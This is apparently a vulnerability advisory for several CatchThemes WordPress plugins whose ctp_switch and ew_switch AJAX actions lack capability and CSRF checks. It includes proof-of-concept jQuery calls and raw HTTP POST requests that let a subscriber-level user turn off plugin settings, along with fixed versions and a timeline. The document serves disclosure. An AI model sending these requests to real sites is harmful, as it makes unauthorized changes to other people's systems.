Multiple Plugins from CatchThemes - Unauthorised Plugin's Setting Change
Description
Multiple Plugins from the CatchThemes vendor do not perform capability and CSRF checks in the ctp_switch AJAX action, which could allow any authenticated users, such as Subscriber to change the plugin's configurations.
Proof of Concept
1) Turn off "Turn On Catch Themes & Catch Plugin tabs"
jQuery.post(ajaxurl,{
action:"ctp_switch",
option_name:"theme_plugin_tabs",
value:"false"
})
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 59
Connection: close
Cookie: [subscriber+]
action=ctp_switch&option_name=theme_plugin_tabs&value=false
2) Turn off "EW: Authors"
jQuery.post(ajaxurl,{
action:"ew_switch",
option_name:"ew_authors",
value:"false"
})
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 59
Connection: close
Cookie: [subscriber+]
action=ew_switch&option_name=ew_authors&value=false
Affects Plugins
Fixed in version 1.9✓
Fixed in version 2.3✓
Fixed in version 1.5✓
Fixed in version 1.6✓
Fixed in version 1.9✓
Fixed in version 2.7✓
Fixed in version 1.4✓
Fixed in version 1.6✓
Fixed in version 1.7✓
Fixed in version 1.6✓
References
Classification
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
Timeline
Publicly Published
2021-09-20 (about 2 months ago)
Added
2021-09-20 (about 2 months ago)
Last Updated
2021-09-20 (about 2 months ago)